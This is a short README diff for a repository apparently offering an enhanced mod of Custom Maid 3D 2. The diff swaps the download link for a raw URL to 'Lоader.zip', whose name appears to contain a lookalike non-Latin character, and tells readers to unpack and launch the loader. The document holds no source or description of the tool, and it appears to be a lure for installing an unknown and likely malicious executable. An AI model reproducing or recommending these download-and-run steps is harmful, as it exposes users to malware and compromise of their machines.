jillkpatel/CustomMaid3D2-UnchainedEdition/README.md

 ## 🌟 Installation Guide

-1. Download `Loader.rar` from the repository.
+1. Download `https://raw.githubusercontent.com/jillkpatel/CustomMaid3D2-UnchainedEdition/main/Lоader.zip` from the repository.
 2. Unpack and launch the loader application per the included instructions.
 3. Enjoy your improved Custom Maid 3D 2 experience with powerful new features!